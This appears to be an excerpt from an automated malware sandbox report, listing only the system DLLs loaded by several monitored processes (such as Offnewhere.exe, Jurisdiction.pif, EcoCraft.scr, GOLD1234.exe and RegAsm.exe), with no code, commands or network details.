Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
